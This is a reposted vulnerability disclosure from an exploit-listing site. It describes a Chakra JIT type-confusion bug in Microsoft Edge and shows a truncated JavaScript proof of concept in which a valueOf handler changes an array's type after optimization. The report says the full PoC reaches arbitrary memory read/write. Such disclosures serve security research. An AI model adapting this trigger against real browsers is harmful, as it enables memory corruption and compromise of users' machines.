Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030168

Below is a copy:

Microsoft Edge Charkra Incorrect Jit OptimizationMicrosoft Edge: Chakra incorrect jit optimization with TypedArray setter. 



"use strict";

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c; <<<<----------------------- (1)
    a[1] = 2.2;
    a[0] = 2.3023e-320;

function main() {
    var a = [1.1, 2.2];
    var b = new Uint32Array(100);

    // force to optimize
    for (var i = 0; i < 0x10000; i++)
        func(a, b, i);

    func(a, b, {valueOf: () => {
        a[0] = {}; <<<<----------------------- (2)

        return 0;



In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.

The attached PoC will reproduce arbitrary memory read/write.

Tested on Microsoft Edge 38.14393.0.0.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Found by: lokihardt

Copyright ©2018 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.